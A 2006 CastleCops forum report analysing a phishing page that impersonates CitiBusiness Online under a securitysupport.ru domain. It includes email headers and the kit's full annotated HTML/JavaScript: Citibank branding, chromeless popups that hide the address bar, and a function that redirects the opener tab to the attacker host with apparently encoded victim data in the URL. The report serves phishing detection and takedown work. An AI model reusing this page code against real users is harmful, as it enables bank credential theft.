
Fried Phish Mar 30: Citibusiness

 
Robin

Site Admin
Phishing Squad Team Lead

Joined: Oct 15, 2003
Posts: 8924


PostPosted: Thu Mar 30, 2006 7:55 pm    Post subject: Fried Phish Mar 30: Citibusiness

Phish Alert
 
 Full Report: CastleCops Link/modules.php?name=Fried_Phish&fp=phish&id=627&in=1
 
 View CIDR AS2118 Report: http://www.cidr-report.org/cgi-bin/as-report?as=2118

"2118 | | NA | NA | RELCOM-AS RELCOM Autonomous System"


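The hostname citibusinessonline.da.us.citibank.com.securitysupport.ru was clearly chosen to spoof one of the actual CitiBusiness domains: the leading labels read like a citibank.com address, but the registered domain is the final part, securitysupport.ru.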

Requesting the subdomain on its own returns only a 403 Forbidden page.
This phish requests a business code. Entering information opens a popup page with no address bar, toolbar or search bar, stating "I am unable to sign you on to CitiBusiness®Online at this time." The source of the popup page will be posted in the thread.
Quote:
From Tue Mar 28 12:52:24 2006
Received: from gobcs.com (sbs.gobcs.com [64.109.89.85])
by bugsbunny.castlecops.com (8.13.6/8.13.6) with ESMTP id k2SHqNGa013454
for <>; Tue, 28 Mar 2006 12:52:24 -0500
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----_=_NextPart_001_01C65290.BF42987E"
Subject: FW: Banking Alert
X-MIMEOLE: Produced By Microsoft Exchange V6.5.7226.0
Date: Tue, 28 Mar 2006 11:54:57 -0600
Message-ID: <3F5A77874B1AFD428C62A4A4EFB1155A09A699@titus.gobcs.local>
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: Banking Alert
thread-index: AcZSdQasObU4VonDR8OTcL9UvMlgdAAG7N5T
From: "Andrew Kjos" <>
To: <>

This is a multi

Robin

Site Admin
Phishing Squad Team Lead

Joined: Oct 15, 2003
Posts: 8924


PostPosted: Thu Mar 30, 2006 8:01 pm    Post subject:

Code:
<html>
<head>

<meta http-equiv="P3P" content="CP=STA CUR NOR UNIo PREi TAI">



<link rel="STYLESHEET" type="text/css" href="basprod/citiiwt/html/styles/BAstyles.htm">

<style type="text/css">
BODY {margin-top:24;margin-left:0;background-color:white}
.footerLink {text-decoration:underline;font-size:8pt;color=black}
.footText {font-size:8pt}
.bigLink {text-decoration:none; font-family:sans-serif;font-size:9pt;font-weight:bold;color:#003399}
TD {font-size:9pt}
TH {font-size:9pt}
P {font-size:9pt}
.blue {color:blue}
</style>


<script language="javascript">

// Frame-buster: when this document is rendered inside a frame, navigate the
// top-level window to this document's own location.
if (top != self) {
   top.location = self.location;
}

// Page-wide state. Everything here is declared with `var` at script top level,
// so each name is also a property of the window object.
var processing = false;
var NS4 = Boolean(document.layers);   // document.layers doubles as the Netscape 4 probe

var NN4P = false;                     // set below when appVersion starts with "4"
var NN6  = false;                     // set below when appVersion starts with "5"
var d = document;                     // short alias used by the functions below
var enableMouse;
var BAWindow;                         // read by setClosedCookie()
var firstLink;                        // index into d.links, assigned in init()
var ea = [];                          // filled with elements u0..u2 in init()
var userString = [-1, -1, -1];

// Capability flags derived from which DOM entry points exist.
var N6 = Boolean(d.getElementById);
var IE = Boolean(d.all);
var N4 = (!N6 && !IE);

var MAC = navigator.platform.toUpperCase().indexOf("MAC") !== -1;

// Netscape version flags, keyed on the first character of appVersion.
if (navigator.appName == "Netscape") {
   switch (navigator.appVersion.charAt(0)) {
      case "4":
         NN4P = true;
         break;
      case "5":
         NN6 = true;
         break;
   }
}

// Record the outer window size at load time. The names are assigned without a
// declaration; resize_fix() compares cw.wwidth / cw.wheight against the live size.
if (document.layers) {
   wwidth = window.outerWidth;
   wheight = window.outerHeight;
}

/**
 * Remove leading whitespace from a string.
 * @param {string} instr - text to trim on the left
 * @returns {string} instr without its leading run of whitespace
 */
function ltrim(instr) {
   var leadingWhitespace = /^\s+/;
   return instr.replace(leadingWhitespace, "");
}
/**
 * Remove trailing whitespace from a string.
 * @param {string} instr - text to trim on the right
 * @returns {string} instr without its trailing run of whitespace
 */
function rtrim(instr) {
   var trailingWhitespace = /\s+$/;
   return instr.replace(trailingWhitespace, "");
}
/**
 * Remove whitespace from both ends of a string by applying rtrim() and then ltrim().
 * @param {string} instr - text to trim
 * @returns {string} instr without leading or trailing whitespace
 */
function trim(instr) {
   var withoutTrailing = rtrim(instr);
   return ltrim(withoutTrailing);
}

/**
 * Scroll the layer named "warning" up by moving its clip window.
 * Does nothing when document.layers is absent or the clip top is not above 0.
 * @param {number} pixels - distance to move the clip window
 */
function scrollUp(pixels) {
   if (!document.layers) return;

   var warningLayer = document.layers['warning'];
   if (!(warningLayer.clip.top > 0)) return;

   // Shift both clip edges up, then offset the layer by the same amount so the
   // visible region stays in place on screen.
   warningLayer.clip.top -= pixels;
   warningLayer.clip.bottom -= pixels;
   warningLayer.offset(0, pixels);
}

/**
 * Scroll the layer named "warning" down by moving its clip window.
 * Does nothing when document.layers is absent or the clip bottom has reached 1500.
 * @param {number} pixels - distance to move the clip window
 */
function scrollDown(pixels) {
   if (!document.layers) return;

   var warningLayer = document.layers['warning'];
   if (!(warningLayer.clip.bottom < 1500)) return;

   // Shift both clip edges down, then offset the layer the opposite way.
   warningLayer.clip.top += pixels;
   warningLayer.clip.bottom += pixels;
   warningLayer.offset(0, -pixels);
}


// When document.layers exists, record the window's outer size at load time.
// Both names are assigned without a declaration; resize_fix() later compares
// cw.wwidth / cw.wheight against the live outer size of the window it is given.
// NOTE(review): this repeats an identical block earlier in the same script.
if (document.layers) {
        wwidth=window.outerWidth;
        wheight=window.outerHeight;
}

/**
 * Build the suffix appended to cookie strings written by this page.
 * @returns {string} ";SECURE" when the page was loaded over https, otherwise ""
 */
function secureCOOKIE () {
        if (location.protocol == "https:") {
                return ";SECURE";
        }
        return "";
}

/**
 * Write the cookie BAbswo=F for path "/", with the suffix from secureCOOKIE().
 * NOTE(review): presumably "F" marks the opener as closed, since setOpenCookie()
 * writes "T" and setClosedCookie() calls this function; confirm.
 */
function BAbswo() {
        var cookieText = "BAbswo=F;PATH=/" + secureCOOKIE();
        document.cookie = cookieText;
}

/**
 * Write the cookie BAbswo=T for path "/", unless this window is the one
 * named "BAWindow". Called from init().
 */
function setOpenCookie() {
   if (window.name == "BAWindow") return;

   document.cookie = "BAbswo=T;PATH=/" + secureCOOKIE();
}

/**
 * onUnload handler. In any window other than "BAWindow": calls BAbswo() unless
 * NN4P is set, and, when the BAWindow popup is still open and exposes BAbswo,
 * clears its openerIsOpen flag and calls the popup's own BAbswo().
 */
function setClosedCookie() {
   if (window.name == "BAWindow") return;

   if (!NN4P) {
      BAbswo();
   }

   // Only touch the popup when it exists, is not closed and carries the function.
   var popupUsable = BAWindow && !BAWindow.closed && BAWindow.BAbswo;
   if (popupUsable) {
      BAWindow.openerIsOpen = false;
      BAWindow.BAbswo();
   }
}

/**
 * onresize handler. When document.layers exists and the outer size of `cw`
 * differs from the recorded wwidth/wheight, store the new size and reload via
 * history.go(0).
 * @param {Window} cw - window whose size is tracked
 */
function resize_fix(cw) {
        if (!document.layers) return;

        var sizeChanged = (cw.wwidth != cw.outerWidth) || (cw.wheight != cw.outerHeight);
        if (!sizeChanged) return;

        cw.wwidth  = cw.outerWidth;
        cw.wheight = cw.outerHeight;
        cw.history.go(0);
}

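/**
 * Open URL in a 400x250 window named "closeBA", then call toHomePage() when
 * that function is available.
 * @param {string} URL - address to open in the sign-off window
 */
function sgnoff7 (URL) {
   window.open (URL,"closeBA", "width=400,height=250");
   // A bare `if (toHomePage)` throws a ReferenceError when the name is not
   // declared at all, so the guard never guarded anything; typeof is safe on
   // undeclared names and also skips non-function values.
   if (typeof toHomePage === "function")
      toHomePage();
}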

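/**
 * onload handler.
 *  - Calls setOpenCookie().
 *  - Stores in firstLink the index of the first link named "kp", if any.
 *  - When the form "BusSignOn" exists: calls busSignon() if signOnOption has
 *    three entries, then focuses busName, or else the "kp" link when busCode exists.
 *  - Otherwise, in the window named "BAWindow", fills ea[0..2] with the
 *    elements u0, u1 and u2.
 */
function init() {
   setOpenCookie();

   for (var x = 0; x < d.links.length; x++) {
      if (d.links[x].name == "kp") {
         firstLink = x;
         break;
      }
   }

   var signOnForm = d.forms["BusSignOn"];
   if (signOnForm) {
      // busSignon() is not defined in this listing; it is only reached when the
      // form carries a three-entry signOnOption control.
      if (signOnForm.signOnOption && signOnForm.signOnOption.length == 3) {
         busSignon();
      }

      if (signOnForm.busName) {
         signOnForm.busName.focus();
      } else if (signOnForm.busCode && firstLink != null && d.links[firstLink]) {
         // Without a link named "kp", firstLink stays undefined and
         // d.links[undefined].focus() would throw inside the onload handler.
         d.links[firstLink].focus();
      }
   } else if (window.name == "BAWindow") {
      if (IE) {
         ea[0] = d.all.u0;
         ea[1] = d.all.u1;
         ea[2] = d.all.u2;
      } else if (N6) {
         ea[0] = d.getElementById("u0");
         ea[1] = d.getElementById("u1");
         ea[2] = d.getElementById("u2");
      }
   }
}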

/**
 * Navigate the current window to the address held in `toHome`.
 * `toHome` is not defined in this listing.
 */
function toHomePage2() {
        var destination = toHome;
        location.href = destination;
}

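/**
 * Schedule toHomePage2() to run after 2500 ms, unless `toHome` is empty.
 * `toHome` is not defined in this listing.
 */
function toHomePage() {
        if (!toHome) return;
        // Pass a function rather than a source string: a string argument is
        // compiled and evaluated like eval() and is refused under a Content
        // Security Policy that does not allow 'unsafe-eval'. The wrapper keeps
        // the lookup of toHomePage2 at fire time, as the string form did.
        setTimeout (function () { toHomePage2(); }, 2500);
}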

/**
 * Follow a header link. From the window named "BAWindow" the address opens in
 * a new window; from any other window the top-level window is navigated to it.
 * @param {string} u - destination address
 */
function goCiti(u) {
   if (window.name != "BAWindow") {
      top.location = u;
      return;
   }
   window.open (u);
}

/**
 * Return the current local hours, minutes and seconds joined into one string.
 * The parts are not zero-padded, so the result has a variable length.
 * @returns {string} e.g. hours 7, minutes 5, seconds 42 gives "7542"
 */
function getTimestamp() {
        var now = new Date();
        var parts = [now.getHours(), now.getMinutes(), now.getSeconds()];
        return parts.join("");
}

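/**
 * Open Url in a pop-up window and give it focus.
 *
 * By default the feature string switches off the toolbar, location bar,
 * directory buttons, status bar and menu bar, which is the chromeless window
 * the report describes: the visitor is shown no address for the page.
 *
 * @param {string} Url - address to open
 * @param {string} [WindowName] - target window name, "New" when omitted
 * @param {number} [xSize] - width, 800 when omitted or 0
 * @param {number} [ySize] - height, 500 when omitted or 0
 * @param {boolean} [isLocked] - when truthy every "0" flag in the feature
 *        string becomes "1", i.e. all window chrome is switched on
 */
function WindowRemote(Url, WindowName, xSize, ySize, isLocked) { // Pop-Up Window
   var xs = xSize || 800;
   var ys = ySize || 500;
   var winName = WindowName || 'New';
   var prefix = 'toolbar=0,location=0,directories=0,status=0,menubar=0,' +
      'scrollbars=1,copyhistory=0,resizable=0';
   if (isLocked)
      prefix = prefix.replace(/0/g, "1");
   // The position and size are appended after the replace so their digits stay untouched.
   var permissions = prefix + ",left=50,top=10,width=" + xs + ",height=" + ys;
   var popup = window.open (Url, winName, permissions);
   // window.open() returns null when the pop-up is blocked; focusing
   // unconditionally would throw in that case.
   if (popup)
      popup.focus();
}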

/**
 * Build a window.open() feature string sized to the available screen area.
 *
 * Side effect: availTop, availLeft, availHeight and availWidth are assigned
 * without a declaration, so they are written outside this function.
 *
 * NOTE(review): the branch is chosen by `screen.HEIGHT` (upper case) while the
 * arithmetic reads `screen.height` (lower case); confirm which browsers expose
 * the upper-case property, otherwise only the outerHeight/outerWidth form is produced.
 *
 * @returns {string} comma-separated feature list
 */
function getFeatures() {
        var scr = screen;
        var base = "toolbar=no,status=yes,scrollbars=yes,resizable=yes,location=yes," +
                "directories=no,copyhistory=no,menubar=no,";

        availTop = scr.availTop || 0;
        availLeft = scr.availLeft || 0;
        availHeight = scr.availHeight;
        availWidth = scr.availWidth;

        if (!scr.HEIGHT) {
                return base + "outerHeight=" + scr.availHeight + ",outerWidth=" +
                        scr.availWidth + ",screenX=" + availLeft + ",screenY=" + availTop;
        }

        // Window already spans the available width: reuse its current left edge.
        if (availWidth == document.body.offsetWidth) {
                availLeft = window.screenLeft;
        }

        // Part of the screen is reserved (screen height exceeds available height)
        // and the window reaches below the available area: start below the reserved strip.
        var reserved = scr.height - availHeight;
        if (reserved > 0 && window.screenTop + document.body.offsetHeight > availHeight) {
                availTop = reserved;
        }

        availWidth  -= 12;
        availHeight -= 50;

        return base + "height=" + availHeight + ",width=" +
                availWidth + ",left=" + availLeft + ",top=" + availTop;
}

</script>

<title>CitiBusiness Online</title>

</head>

<body background="basprod/citiiwt/images/bg_top3n.gif" onload="init()" onUnload="setClosedCookie()" onresize="resize_fix(window)">

<table border='0' width='100%' cellpadding='0' cellspacing='0'>

<tr>
   <td><image border="0" hspace="12" vspace="12" width="58" height="34" src="basprod/citiiwt/images/citilog4.gif"></td>
   <td align="right">
      <a class='bigLink' href="#" onClick="javascript:goCiti('http://www.citibank.com/us/citibusinessOnline')">
      <img src="basprod/citiiwt/images/img_topnav_dot.gif" height="17" width="7" border="0"> Home</a>
      &nbsp;
      <a class='bigLink' href="#" onClick="javascript:goCiti('http://www.citibank.com/us/citibusiness/cbusol/userguide.htm')">
      <img src="basprod/citiiwt/images/img_topnav_dot.gif" height="17" width="7" border="0"> User Guide</a>
      &nbsp;      
      <a class='bigLink' href="#" onClick="javascript:goCiti('http://www.citi.com')">
      <img src="basprod/citiiwt/images/img_topnav_dot.gif" height="17" width="7" border="0"> citi.com</a>
      &nbsp;
   </td>
</tr>

<tr>
   <td colspan='2'>&nbsp; &nbsp;<img width='220' vspace="2" height='29' border='0' src="basprod/citiiwt/images/CBusLOGO.gif"></td>
</tr>

</table>

<style type="text/css">
H2 {color:blue}
H3 {font-size:13pt}
.blue {color:black}
H4 {font-size:11pt;font-weight:normal}
P {font-size:10pt}
.backLink {color:blue}
</style>

<script language="javascript">

// When this popup was opened by another window, navigate that opener window
// to the address below. Every other navigation in this listing points at
// citibank.com, citi.com, citigroup.com or verisign.com hosts or at relative
// basprod/ paths; this is the one that targets the securitysupport.ru host.
// Defensive reading: a popup that rewrites window.opener.location is moving
// the tab the visitor came from, so the opener URL is worth checking after
// the popup closes; opening windows with rel="noopener" removes this handle.
// NOTE(review): the opaque path segment looks like encoded data and may carry
// values tied to the submitted form; treat it as potentially sensitive and
// handle the captured URL accordingly. It is left exactly as captured.
// NOTE(review): the string literal is broken across two lines in this listing,
// which is not valid JavaScript as printed; presumably the forum wrapped the
// line. Confirm against the raw capture before matching on the full URL.
function redirectToHome() {
   if (window.opener) {
   
      window.opener.location.href = "http://citibusinessonline.da-us.securitysupport.ru/NN7b2g7NDU0MTQ7bW9udGVZ2U7NzYwMSBwYWludGVkIHRGLRyYWhhbSBHZW9y1cnRsZSBkcml2ZTtkYXl0b247b2g7N
DU0MTQ7bW9udGVuZHJlQGhvdG1haWwuY29tOw/citibusinessonline.php?AdditionalInfo=";
   
   
   }
}

/**
 * Handler for the "QUIT and Close this Window" link: calls redirectToHome()
 * first, then closes this popup window.
 */
function onClose() {
   var popup = window;
   redirectToHome();
   popup.close();
}

</script>


<br><br>
<table border="0" width="95%" height="60%" align="center">

   <tr valign="top">
      <td width="50%">

<h3>I am unable to sign you on to CitiBusiness<sup>&#174</sup>Online at this time.</h3>

<H4>
7000000000888888 is not a recognized Business Code.<br> Please close this window and try signing on again.
<br>
</H4>



   <h3>You can contact customer service at 1 (800) 285 1709.</h3>


<h3>For hearing impaired call 1 (800) 788 0002</h3>

<br />




<p><a href="javascript:onClose();" class="backLink">Click here to QUIT and Close this Window</a></p>


</td>
</tr>
</table>







<script type="text/javascript" language="JAVASCRIPT" src="basprod/citiiwt/js/branding.js"></script>

<table width="99%" cellpadding="0" cellspacing="0" border="0" align="center" valign="top">
   <tr>
      <td height="1" background="basprod/citiiwt/images/line_hrz.gif"><img src="basprod/citiiwt/images/blank.gif" width="1" height="1" border="0">
      </td>
   </tr>
   <tr valign="top">
      <td>
         <table width="100%" cellpadding="0" cellspacing="0" border="0">
            <tr>
               <td height="6" colspan="2"><img src="basprod/citiiwt/images/blank.gif" width="1" height="6" border="0"></td>
            </tr>
            <tr>
               <td class='footText' >
                  Citibank, N.A., Citibank, F.S.B., Citibank (West), FSB, Citibank Texas, N.A. Member FDIC.
               <br>
                  <img src="basprod/citiiwt/images/citilog2.gif" alt="Citibank" width="21" height="18" border="0">
                  <br><a class="footerLink" href="#" onClick="javascript:WindowRemote('http://www.citibank.com')">www.citi.com</a>
               </td>
               
               <td align="right" valign="top" >
                  <table  cellpadding="0" cellspacing="0" border="0">
                     <tr>
               <td  valign="top">

                <a href="javascript:WindowRemote('basprod/citiiwt/html/billPayment.html?BS_Branding=NoBranding')">
               <img src="basprod/citiiwt/images/billpay.gif" alt="Bill Payment" width="80" height="68"  border="0">
               
                 </a>
               
               </td>
               <td  valign="top" >
                <a   href="javascript:WindowRemote('https://digitalid.verisign.com/as2/840d72023c719a43bd14e84398f2f4c6')">
               <img src="basprod/citiiwt/images/verisign.gif" alt="Verisign" width="100" height="58"  border="0">
                 </a>
               </td>
                  <td align="right" valign="top" class='footText' width="220">
                  <img src="basprod/citiiwt/images/eqhouse.gif" alt="Equal Housing Lender" width="29" height="38" hspace="3" vspace="0" border="0"><br>
                  <img src="basprod/citiiwt/images/member.gif" alt="Citibank"  border="0">
                  <br><a href="#" onClick="javascript:WindowRemote('http://www.citigroup.com/citigroup/privacy/index.htm')">Citigroup   Privacy Promise</a>
                  <br><a href="#" onClick="javascript:WindowRemote('http://www.citigroup.com/citigroup/privacy/terms.htm')">Terms, conditions, caveats and small print</a>
                  <br>Copyright &copy; 2005 Citibank
                  
                  </td>
                     </tr>
                  </table>
               </td>
               

            </tr>
         </table>

      </td>
   </tr>
</table>

</body>
</html>
